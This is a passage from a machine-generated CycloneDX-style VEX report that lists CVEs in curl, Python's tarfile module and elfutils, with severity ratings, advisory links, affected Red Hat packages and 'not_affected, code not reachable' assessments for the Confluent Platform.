          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13034",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        295
      ],
      "description": "When using `CURLOPT_PINNEDPUBLICKEY` option with libcurl or `--pinnedpubkey`\nwith the curl tool,curl should check the public key of the server certificate\nto verify the peer.\n\nThis check was skipped in a certain condition that would then make curl allow\nthe connection without performing the proper check, thus not noticing a\npossible impostor. To skip this check, the connection had to be done with QUIC\nwith ngtcp2 built to use GnuTLS and the user had to explicitly disable the\nstandard certificate verification.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13034"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13034"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-13034.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r76-qj98-jfhc"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13034"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13034"
        }
      ],
      "published": "2026-01-08T10:15:45+00:00",
      "updated": "2026-06-17T08:33:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-13462",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        74,
        434
      ],
      "description": "The \"tarfile\" module would still apply normalization of AREGTYPE (\\x00) blocks to DIRTYPE, even while processing a multi-block member such as GNUTYPE_LONGNAME or GNUTYPE_LONGLINK. This could result in a crafted tar archive being misinterpreted by the tarfile module compared to other implementations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-13462"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-13462"
        },
        {
          "url": "https://github.com/python/cpython/commit/42d754e34c06e57ad6b8e7f92f32af679912d8ab"
        },
        {
          "url": "https://github.com/python/cpython/commit/72dde1016493c52abe857fc4a7bf6c40138b4114"
        },
        {
          "url": "https://github.com/python/cpython/commit/7ad3093d76a748af55bdb1d2e8aad3638163b017"
        },
        {
          "url": "https://github.com/python/cpython/commit/9a23b753552afa28e3a2f4d8863572fc66479406"
        },
        {
          "url": "https://github.com/python/cpython/commit/ae99fe3a33b43e303a05f012815cef60b611a9c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/d10950739a78f54d0718d88fb5a868374603c084"
        },
        {
          "url": "https://github.com/python/cpython/issues/141707"
        },
        {
          "url": "https://github.com/python/cpython/pull/143934"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/EOMI5I66ZMKQ2INNFT6T7IAIKUGPZYIE/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13462"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-13462"
        }
      ],
      "published": "2026-03-12T18:16:21+00:00",
      "updated": "2026-08-13T01:16:50+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1371",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        404,
        476
      ],
      "description": "A vulnerability has been found in GNU elfutils 0.192 and classified as problematic. This vulnerability affects the function handle_dynamic_symtab of the file readelf.c of the component eu-read. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The patch is identified as b38e562a4c907e08171c76b8b2def8464d5a104a. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1371"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1371"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1371"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15926"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32655#c2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://vuldb.com/?ctiid.295978"
        },
        {
          "url": "https://vuldb.com/?id.295978"
        },
        {
          "url": "https://vuldb.com/?submit.496484"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
        },
        {
          "url": "https://www.gnu.org/"
        }
      ],
      "published": "2025-02-17T03:15:09+00:00",
      "updated": "2026-06-17T08:39:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "0.194-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.194-1.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libelf@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/elfutils-libs@0.194-1.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-1376",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        404
      ],
      "description": "A vulnerability classified as problematic was found in GNU elfutils 0.192. This vulnerability affects the function elf_strptr in the library /libelf/elf_strptr.c of the component eu-strip. The manipulation leads to denial of service. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The name of the patch is b16f441cca0a4841050e3215a9f120a6d8aea918. It is recommended to apply a patch to fix this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-1376"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-1376"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1376"
        },
        {
          "url": "https://sourceware.org/bugzilla/attachment.cgi?id=15940"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=32672#c3"
        },
        {
          "url": "https://vuldb.com/?ctiid.295984"
        },
        {
